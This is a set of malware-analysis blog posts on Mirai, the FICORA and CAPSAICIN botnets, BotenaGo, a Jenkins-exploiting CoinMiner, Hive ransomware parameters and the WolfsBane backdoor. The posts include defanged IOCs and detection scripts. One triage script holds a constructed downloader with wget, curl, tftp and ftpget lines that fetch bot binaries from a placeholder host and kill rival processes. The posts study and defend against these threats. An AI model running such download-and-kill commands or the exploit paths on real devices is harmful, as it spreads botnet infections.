Tuesday, January 21, 2025

Mirai: How an IoT DDoS Botnet Protects and Disguises Itself and Acts as an Aggressive Attacker (Analysis)

 


Summary

Since 2016, when the Mirai source code was published, botnets of the same family have kept emerging, and IoT security has become a major challenge. That is what drew me to botnet research. Recently Mirai caught my attention again, and I wanted to analyze it from a different angle, so here it is.

 

Analysis

 

Protect and Disguise Itself

Like other malware that tries to keep analysts from debugging it, Mirai uses the function anti_gdb_entry, which takes one parameter, to detect debugging under gdb. If it detects debugging, it calls unlink to delete its own binary, and it also tries to stop the watchdog from rebooting the device so that it keeps running all the time and never goes offline.


Figure1-anti-debug, delete self and keep running

 

It generates a random string whose length is 12, 16, 20 or 24 characters as the process name and calls util_strcpy to copy that string over args[0], hiding the real name.


Figure2-Hide argv0

 

It also generates a random string of 12 to 32 characters as the process name and calls the prctl function to change the name of the process.

Figure3-Hide process name
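As an added example (not code from the original post), the following defender-side heuristic looks for the three traces described above on a Linux host: a random-looking argv[0], a random-looking prctl() name, and a binary that was unlinked while still running (the /proc/<pid>/exe link then ends in " (deleted)"). The alphabet, the length set and the two-indicator threshold are this example's assumptions.

```python
import os
import re
import string

# Assumed Mirai name alphabet: upper/lower letters and digits; lengths are ((rand % k) + 3) * 4
RANDOM_NAME = re.compile(r"^[A-Za-z0-9]+$")
LENGTHS = {12, 16, 20, 24, 28, 32}


def looks_random(name: str) -> bool:
    """Alphanumeric, a Mirai-style length, and mixing at least two character classes."""
    if len(name) not in LENGTHS or not RANDOM_NAME.match(name):
        return False
    classes = sum(any(c in cls for c in name)
                  for cls in (string.ascii_lowercase, string.ascii_uppercase, string.digits))
    return classes >= 2


def score_process(comm: str, argv0: str, exe: str) -> list:
    """Return the indicators that match for one process (empty list = nothing suspicious)."""
    hits = []
    if looks_random(argv0.rsplit("/", 1)[-1]):
        hits.append("random argv[0]")
    if looks_random(comm):
        hits.append("random prctl name")
    if exe.endswith(" (deleted)"):
        hits.append("running binary deleted from disk")
    return hits


def scan_proc(proc: str = "/proc") -> dict:
    """Walk /proc on a live host and report processes with two or more indicators."""
    findings = {}
    for entry in os.listdir(proc):
        if not entry.isdigit():
            continue
        base = os.path.join(proc, entry)
        try:
            with open(os.path.join(base, "comm")) as f:
                comm = f.read().strip()
            with open(os.path.join(base, "cmdline"), "rb") as f:
                argv0 = f.read().split(b"\0", 1)[0].decode(errors="replace")
            exe = os.readlink(os.path.join(base, "exe"))
        except OSError:
            continue  # process exited, or we lack permission to inspect it
        hits = score_process(comm, argv0, exe)
        if len(hits) >= 2:
            findings[int(entry)] = hits
    return findings


if __name__ == "__main__":
    for pid, hits in scan_proc().items():
        print(pid, ", ".join(hits))
```

Run it as root so /proc/<pid>/exe is readable for every process; a single indicator alone is common on a healthy host, which is why two are required.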

 

 

Aggressive Attacker

Mirai kills the processes of the known "anime" botnet to make sure it is the only bot running on the victim host or compromised IoT device.

Figure4-kill anime botnet

 

Mirai kills the telnet, SSH and HTTP services, prevents them from restarting, and thereby also blocks other botnets from getting in the same way.

Figure5-kill tcp/23 telnet

 

A more advanced technique scans memory to detect and kill other malware binaries.

Figure6 scan in memory for binary

 

 

End.


Sunday, January 19, 2025

Botnets continue to exploit vulnerabilities: FICORA botnet analysis

 


Summary

 

Back on December 26, 2024, FortiGuard Labs reported a new variant called "FICORA" that is frequently spread through documented D-Link vulnerabilities, which allow remote attackers to execute malicious commands on victim hosts, such as downloading malware, brute-force attacks and DDoS flooding.

 

Analysis

 

Why is the botnet named "FICORA"?

The FICORA bot is named after strings found inside the malware.


Figure1- special strings

 

The shell script tries multiple download strategies, such as wget, ftpget, tftp and curl, to fetch the FICORA malware.


Figure2-downloader with multiple strategies for getting malware

 

 

The shell script kills all processes with the same file extension.


Figure3-downloader with kill -9 command

 

The shell script tries to find and kill any process containing the keyword "dvrHelper"; the keyword is stored as hex and can be decoded back to a string. A small part is shown below.


Figure4- malware inside hexadecimal script


Figure5- malware inside script with plain text
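As an added example (not code from the original post or from the malware), the triage helper below handles the three script behaviours described above: it pulls the download targets out of wget, curl, tftp and ftpget lines, lists the names the kill commands target, and decodes "\xNN" hex escapes so a keyword such as dvrHelper becomes readable. The script it parses is constructed for this example; EXAMPLE-HOST and the file names are placeholders.

```python
import re

# Constructed sample in the style of a multi-strategy downloader; not a real script.
SAMPLE_SCRIPT = r"""
cd /tmp || cd /var/run
wget http://EXAMPLE-HOST/la.bot.arm7 -O bot
curl -O http://EXAMPLE-HOST/la.bot.mips
tftp -g -r la.bot.x86 EXAMPLE-HOST
ftpget -u anonymous -p anonymous EXAMPLE-HOST la.bot.sh4 la.bot.sh4
pkill -9 -f "\x64\x76\x72\x48\x65\x6c\x70\x65\x72"
kill -9 $(ps | grep "\x2e\x61\x72\x6d\x37" | awk '{print $1}')
"""

# One pattern per download tool; the captured groups are the host/URL and file names
DOWNLOADERS = {
    "wget":   re.compile(r"\bwget\s+(\S+)"),
    "curl":   re.compile(r"\bcurl\s+(?:-\S+\s+)*(\S+)"),
    "tftp":   re.compile(r"\btftp\s+-g\s+-r\s+(\S+)\s+(\S+)"),
    "ftpget": re.compile(r"\bftpget\s+(?:-\S+\s+\S+\s+)*(\S+)\s+(\S+)"),
}
HEX_ESCAPE = re.compile(r"(?:\\x[0-9a-fA-F]{2})+")
KILL = re.compile(r"\b(?:pkill|killall|kill)\b.*?(?:-f\s+)?[\"']([^\"']+)[\"']")


def decode_hex(s: str) -> str:
    """Turn every run of \\xNN escapes into the ASCII it hides."""
    return HEX_ESCAPE.sub(
        lambda m: bytes.fromhex(m.group(0).replace("\\x", "")).decode("ascii", "backslashreplace"), s)


def triage(script: str) -> dict:
    """Return download targets, hex-decoded kill targets, and the set of download tools used."""
    report = {"downloads": [], "kills": [], "tools": set()}
    for line in script.splitlines():
        for tool, rx in DOWNLOADERS.items():
            for m in rx.finditer(line):
                report["tools"].add(tool)
                report["downloads"].append((tool, " ".join(m.groups())))
        for m in KILL.finditer(line):
            report["kills"].append(decode_hex(m.group(1)))
    return report


if __name__ == "__main__":
    for key, value in triage(SAMPLE_SCRIPT).items():
        print(key, value)
```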

 

As you know, the "Mirai" family botnet loader binary also contains the keyword "dvrHelper", as follows.


Figure6-loader bin like dlr.arm7

 

"FICORA" performs brute-force attacks using an embedded username and password list.


Figure7- Brute force attack function with embedded username and password

 

 

The default usernames and passwords embedded in the malware are very similar between FICORA and Mirai.

 

Figure8-username and password compare

 

FICORA and Mirai share multiple similar structures.

 


Figure8-structure compare


Figure9-structure compare

 

 

Comparing the malware "FICORA" to Mirai, it can be identified by similar architecture such as "attack_method_udpplain"; the similarity is 53% and the confidence is 64%.


Figure10-DDoS in udp

 

IOCs

 

downloader md5 cb9f5c8892bffc28f6c12f11d60f5c92

downloader URL


 

FICORA md5 233A1A71307FD7CA5946D90D6977E97A

 

Conclusion

It is highly likely that the malware "FICORA" is a variant of the Mirai family. It can be identified by its many similar architectural features.

 

End.


Saturday, January 18, 2025

Botnets continue to exploit vulnerabilities: CAPSAICIN botnet analysis

 


Summary


Back on December 26, 2024, FortiGuard Labs reported a new variant called "CAPSAICIN" that is frequently spread through documented D-Link vulnerabilities, which allow remote attackers to execute malicious commands on victim hosts, such as downloading payloads, killing botnet processes, DDoS attacks, telnet scanning and installing binaries.


Analysis

 

Why is the botnet named "CAPSAICIN"?

The CAPSAICIN bot is named after strings found inside the malware.


Figure1-special strings

 

 

The PRIVMSG function implies that "CAPSAICIN" supports more functions and their related commands, as follows.


Figure2-command for "CAPSAICIN"


Like other botnets, "CAPSAICIN" kills known botnet processes to ensure it is the only botnet executing on the victim host.

Figure3-pkill -9 known bots

 

AK47SCAN: ak47telscan is used for cracking telnet and is built on open-source projects, as follows.



Figure4-ak47telscan execute

 

How does it get a payload from a remote machine?

It supports multiple download methods, such as wget, tftp and ftpget.


Figure5-multiple ways for payload download

 

How many ways does "CAPSAICIN" perform DDoS attacks?

DDoS supports multiple methods like STD, UNKNOWN, HTTP, HOLD, JUNK, BLACKNURSE, and DNS.

Figure6-DDoS flooding multiple ways


C2 server 45[.]86[.]86[.]60

Figure7-C2

 

 

IOCs:

C2 45[.]86[.]86[.]60

CAPSAICIN 61e7d18a4efdd3273fe436a0d66da732

Payload download link http[:]//pirati.abuser.eu/yak.sh


End.


Thursday, January 16, 2025

‘BotenaGo’ Malware Targets Multiple Routers with 30+ Exploit Functions and Go Reversing Analysis

 


Summary

 

Back on November 11, 2021, AT&T Alien Labs found new malware written in the open-source programming language Golang. Deployed with more than 30 exploits, it had the potential to target millions of routers and IoT devices. Later, LevelBlue Labs published their research on the discovery of this new Golang malware to GitHub.

This blog post does not go into analysis of the open-source code; it sticks to reversing the Go binary.

Recently, as you know, a lot of malware has moved to Go, which presents a new challenge.

Key points about the malware itself:

1. 30+ different exploit functions for different router versions

2. Supports backdoors via telnet and a reverse shell (httpd)

3. No DDoS attack module found inside

4. Plain-text strings in the malware

 

Analysis

 

As you know, BotenaGo is a type of botnet, but when we face new malware we have to analyze what happens in the malware itself.

There are obviously many infection functions for vendors such as D-Link, ZTE, Tenda, Realtek and so on, and several versions of them, such as DlinkTwo, DlinkThree, DlinkFour, DlinkFive, DlinkSix, DlinkSeven and DlinkEight. This tells us the attacker was very familiar with different router vendors and had researched the different versions in depth.

Figure1- infection function to vendors

 

Those 30+ exploit functions correspond to GET and POST requests, which are the attack paths; the CVE vulnerabilities can be derived from those strings.


Figure2- GET strings for exploit functions


Figure3- POST strings for exploit functions

 

The structure of main_scannerInitExploits is very clear, and each infect function follows the same pattern of Add and Change.

Figure4- infect functions are similar


It supports backdoors through a telnet loader and a reverse shell loader.


Figure5- backdoor loader


It creates a shell listening on port 7AB4h (31412).


Figure6- shell port 7AB4h
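The backdoor port is quoted in hex above, which is also how the Linux kernel lists sockets in /proc/net/tcp, so a defender can look for the listener without extra tooling. This parser is an added example, not code from the original post; the socket table below is constructed for it (the column layout matches the real file).

```python
BACKDOOR_PORT = 0x7AB4   # 31412, from the analysis above
TCP_LISTEN = "0A"        # kernel socket state code for LISTEN
TCP_ESTABLISHED = "01"

# Constructed /proc/net/tcp content: an sshd-style listener on 22, the backdoor on 0x7AB4,
# and one established loopback connection to the backdoor.
SAMPLE_PROC_NET_TCP = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 00000000:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 12345 1 0000000000000000 100 0 0 10 0
   1: 00000000:7AB4 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 67890 1 0000000000000000 100 0 0 10 0
   2: 0100007F:9C40 0100007F:7AB4 01 00000000:00000000 00:00000000 00000000  1000        0 11111 1 0000000000000000 20 4 30 10 -1
"""


def hex_to_ip(h):
    """/proc stores IPv4 addresses as host-order hex; on little-endian hosts 0100007F is 127.0.0.1."""
    return ".".join(str(b) for b in reversed(bytes.fromhex(h)))


def parse_proc_net_tcp(text):
    """Yield (local_ip, local_port, remote_ip, remote_port, state, inode) for each socket row."""
    for line in text.splitlines()[1:]:           # skip the header row
        f = line.split()
        if len(f) < 10:
            continue
        lip, lport = f[1].split(":")
        rip, rport = f[2].split(":")
        yield hex_to_ip(lip), int(lport, 16), hex_to_ip(rip), int(rport, 16), f[3], int(f[9])


def find_backdoor_listeners(text, port=BACKDOOR_PORT):
    """(local_ip, inode) of every socket listening on the backdoor port."""
    return [(lip, ino) for lip, lp, _, _, st, ino in parse_proc_net_tcp(text)
            if lp == port and st == TCP_LISTEN]


def find_backdoor_connections(text, port=BACKDOOR_PORT):
    """(local_ip, local_port, remote_ip) of established connections involving that port."""
    return [(lip, lp, rip) for lip, lp, rip, rp, st, _ in parse_proc_net_tcp(text)
            if port in (lp, rp) and st == TCP_ESTABLISHED]


if __name__ == "__main__":
    with open("/proc/net/tcp") as fh:
        table = fh.read()
    print("listeners:", find_backdoor_listeners(table))
    print("connections:", find_backdoor_connections(table))
```

The inode of a hit can be mapped to its owning process by matching it against the socket:[inode] targets of the /proc/<pid>/fd symlinks.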

 

One of the malware payload download links is as follows.

Figure7- payload download link

 

The other IOCs can be collected from the plain-text strings by searching for the keyword "wget".

 

End.


Tuesday, January 14, 2025

CoinMiner with lots of embedded vulnerabilities to exploit

 

This CoinMiner family is very classic: the sample itself embeds lots of vulnerabilities to exploit, all of them N-days. I introduce just one of them with static analysis; here we go.

The sample

(SHA256: 128452242b0ff64f746759e106ce84b998c0b7807380a1f50975ceb8eada430e)

The sample is packed with UPX (3.96).

Figure 1 – packer: UPX (3.96)


Unpacking with the UPX tool shows that the language is Go. Yes, the Go language is very popular for malware development.

Figure 2 – the sample was compiled with Go


OK, let's move on to static analysis. Good luck!

Some function name strings, such as "shell_exploit", were very attractive.


Figure 3 – shell_exploit_* strings

 

Here, "_b42207_" was chosen at random for analysis.


Figure 4 – shell_exploit_ptr_b42207_*

 

In the function "shell_exploit__ptr_b42207_run", you can find an interesting key string: "/securityRealm/user/admin/".


Figure 5 – CVE-2018-1000861: key strings


The complete strings are as follows:

Figure 6 – CVE-2018-1000861 complete string for EXP


This is CVE-2018-1000861, the Jenkins remote command injection.

Of course, the other vulnerabilities can be checked the same way; a lot of work is needed before you end up with a full table.
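Because the key string above is a URL path, the same exploit attempt is visible in web server logs. As an added example (not code from the original post), this scans combined-format access log lines for requests under that Jenkins path, URL-decoding first so an encoded probe is not missed, and groups the hits by client. The log lines are constructed for this example; the sub-path is a placeholder.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Key string from the CVE-2018-1000861 exploit function analysed above
JENKINS_BYPASS_PATH = "/securityRealm/user/admin/"

# Apache/nginx "combined" log line: client, timestamp, request line, status
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample: one benign login, two probes (one URL-encoded), one unrelated request
SAMPLE_LOG = """\
203.0.113.7 - - [14/Jan/2025:10:01:02 +0000] "GET /login HTTP/1.1" 200 1234
203.0.113.7 - - [14/Jan/2025:10:01:05 +0000] "POST /securityRealm/user/admin/PLACEHOLDER-SUBPATH HTTP/1.1" 200 88
198.51.100.9 - - [14/Jan/2025:10:02:11 +0000] "GET /job/build/console HTTP/1.1" 200 5120
203.0.113.7 - - [14/Jan/2025:10:02:40 +0000] "GET /securityRealm/user/admin%2FPLACEHOLDER-SUBPATH HTTP/1.1" 403 12
"""


def parse_line(line):
    """Return the named fields of one log line, or None if it is not in combined format."""
    m = LOG_LINE.match(line)
    return m.groupdict() if m else None


def find_jenkins_probes(log_text):
    """Map client IP -> [(timestamp, method, decoded path, status)] for requests under the bypass path."""
    hits = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        path = unquote(rec["path"])
        if path.lower().startswith(JENKINS_BYPASS_PATH.lower()):
            hits[rec["ip"]].append((rec["ts"], rec["method"], path, int(rec["status"])))
    return dict(hits)


if __name__ == "__main__":
    for ip, events in find_jenkins_probes(SAMPLE_LOG).items():
        print(ip, len(events), "request(s)")
        for ev in events:
            print("   ", *ev)
```

A 200 on such a path on an unpatched Jenkins is the case worth escalating; a 403 still shows someone is probing.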

 

End.


Hive ransomware command-line parameters analysis

 

Back on July 22, 2022, I noted that Microsoft Threat Intelligence reported Hive ransomware getting upgrades in Rust (Hive ransomware gets upgrades in Rust | Microsoft Security Blog).

The report mentioned that, unlike previous variants which had a 'help' menu, in the new variant the attacker must know the parameters beforehand. Since all strings are encrypted, finding the parameters is challenging for security researchers.

Getting the command-line parameters is very challenging for beginners, but recently I wanted to challenge myself.

I chose the sample (SHA-256: 33744c420884adf582c46a4b74cbd9c145f2e15a036bb1e557e89d6fd428e724) to debug.

The sample won't continue its execution, but it still gives the analyst key information.

The first thing is that the sample has to handle input from the user; the second thing is that it prints an error.

Figure 1 – Without a username and a password, the sample won’t continue its execution

The sample uses the function “GetCommandLineW” to get command-line parameters.

Figure 2 – "GetCommandLineW" for getting parameters

Before debugging, we first change the command line by appending any short string, such as "xx", which causes a run-time error.

Figure 3 – change the command line with appending string “xx”

Now let's debug: set a breakpoint on "GetCommandLineW" and run to it, as follows:

Figure 4 – set breakpoint with GetCommandLineW

From here we debug step by step, patiently, and finally find all the parameters, such as –da, –wmi and –min-size.

Figure 5 – -da parameter

Figure 6 – -wmi and –min-size parameter

Different variants have different parameters.

End.


Unveiling Gelsemium’s (毒狼草) Linux backdoor WolfsBane

 

Back on Dec 19, 2024, I noted that ESET researchers analyzed previously unknown Linux backdoors (Unveiling WolfsBane: Gelsemium's Linux counterpart to Gelsevirine).

I was drawn to the part about the WolfsBane backdoor, stored in a file named udevd, which embeds libMainPlugin.so, libUdp.so and libHttps.so.
I tried to extract those three .so files, so let's do it.
We need the malware sample named udevd, SHA-1 0AB53321BB9699D354A032259423175C08FEC1A4,

which came from the first archive, SHA-1 f1df0c5a74c9885cb5934e3eee5e7d3cf4d291c0.



udevd is an ELF file.


Searching for ".so" shows the three modules: libMainPlugin.so, libUdp.so and libHttps.so.
Let's debug udevd with a debugger, be patient, and finally jump here.
We note that the key functions are memcpy and EmbeddedResource, which deserializes the input archive and copies it into memory.
We just need to dump the three .so files from memory.
First: find the start address and the number of bytes of each.
Second: write a Python script to dump them, as follows.
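As an added example (not the author's dump script), the carver below does the "find the start address and size, then dump" step for any ELF image in a memory buffer: it locates each \x7fELF header and computes the image size from the section header table (e_shoff + e_shnum * e_shentsize), which marks the end of a normally linked .so. The buffer it runs on is constructed with fake headers, not real malware.

```python
import struct

ELF_MAGIC = b"\x7fELF"


def elf_size(buf, off):
    """Size of the ELF image at off, or None if the header is unusable (e.g. no section table)."""
    if buf[off:off + 4] != ELF_MAGIC or len(buf) < off + 0x34:
        return None
    is64 = buf[off + 4] == 2                 # EI_CLASS: 1 = 32-bit, 2 = 64-bit
    endian = "<" if buf[off + 5] == 1 else ">"   # EI_DATA: 1 = little-endian, 2 = big-endian
    if is64:
        if len(buf) < off + 0x40:
            return None
        shoff = struct.unpack_from(endian + "Q", buf, off + 0x28)[0]
        shentsize, shnum = struct.unpack_from(endian + "HH", buf, off + 0x3A)
    else:
        shoff = struct.unpack_from(endian + "I", buf, off + 0x20)[0]
        shentsize, shnum = struct.unpack_from(endian + "HH", buf, off + 0x2E)
    if shoff == 0 or shnum == 0:
        return None
    return shoff + shentsize * shnum


def carve_elfs(buf):
    """Return [(offset, size, image_bytes)] for every carvable ELF image in buf."""
    out, pos = [], 0
    while (pos := buf.find(ELF_MAGIC, pos)) != -1:
        size = elf_size(buf, pos)
        if size and pos + size <= len(buf):
            out.append((pos, size, buf[pos:pos + size]))
            pos += size                      # skip past this image before searching again
        else:
            pos += 1
    return out


def fake_elf64(image_len, shnum=3, shentsize=0x40):
    """Constructed little-endian ELF64 header plus zero padding whose computed size is image_len."""
    hdr = bytearray(0x40)
    hdr[:4], hdr[4], hdr[5], hdr[6] = ELF_MAGIC, 2, 1, 1
    struct.pack_into("<Q", hdr, 0x28, image_len - shnum * shentsize)
    struct.pack_into("<HH", hdr, 0x3A, shentsize, shnum)
    return bytes(hdr) + b"\0" * (image_len - 0x40)


# Constructed memory dump: junk, a 0x200-byte image, filler, a 0x300-byte image
SAMPLE_DUMP = b"junk" * 8 + fake_elf64(0x200) + b"\xff" * 16 + fake_elf64(0x300)

if __name__ == "__main__":
    for i, (off, size, image) in enumerate(carve_elfs(SAMPLE_DUMP)):
        with open(f"carved_{i}_{off:#x}.so", "wb") as fh:
            fh.write(image)
        print(f"image {i}: offset {off:#x}, {size} bytes")
```

On a real dump, replace SAMPLE_DUMP with the bytes read from the debugger's memory region; an image whose section table was stripped in memory will need its size taken from the program headers instead.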

Finally, we successfully get libMainPlugin.so, libUdp.so and libHttps.so.
The backdoor encrypts the libMainPlugin.so library using the RC4 algorithm and saves it to <work_directory>/X1l/data/gphoto2.

libUdp.so and libHttps.so provide C&C communications via UDP and HTTPS protocols.
 
End.